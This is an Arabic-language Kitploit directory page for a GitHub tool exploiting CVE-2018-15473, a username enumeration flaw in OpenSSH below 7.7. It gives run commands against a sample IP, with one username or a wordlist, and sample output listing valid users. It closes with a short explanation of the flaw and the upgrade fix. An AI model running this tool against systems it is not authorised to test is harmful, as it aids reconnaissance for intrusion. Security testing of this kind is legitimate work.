Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-15473 — OpenSSH 2.3 < 7.7 - تعداد اسم المستخدم | Kitploit
أدوات/GitHubGitHub/sait-nuri/cve-2018-15473
الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراقالمصادقة
GitHubsait-nuri/cve-2018-15473

CVE-2018-15473

OpenSSH 2.3 < 7.7 - تعداد اسم المستخدم

عرض المستودع
42132منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-15473

استغلال تعداد أسماء المستخدمين SSH (OpenSSH 2.3 < 7.7)

نسخة معدلة من الاستغلال الأصلي: https://www.exploit-db.com/exploits/45233

  • تم التحويل إلى Python3
  • إضافة خيار قائمة كلمات مرور أسماء المستخدمين

كيفية التشغيل

root@kitploit:~
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
root@kitploit:~
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
root@kitploit:~
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users: 
root
root@kitploit:~
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h

حول الثغرة:

يستجيب النظام بشكل مختلف لمحاولات المصادقة الصحيحة والخاطئة. يمكن للمستخدم عن بُعد إرسال طلبات مصممة خصيصًا لتحديد أسماء المستخدمين الصحيحة على النظام المستهدف. وبالتالي، يمكن للمستخدم عن بُعد تحديد أسماء المستخدمين الصحيحة على النظام المستهدف.

الحل:

يجب ترقية خادم OpenSSH إلى الإصدار 7.7 أو أعلى.

تنزيل الأداة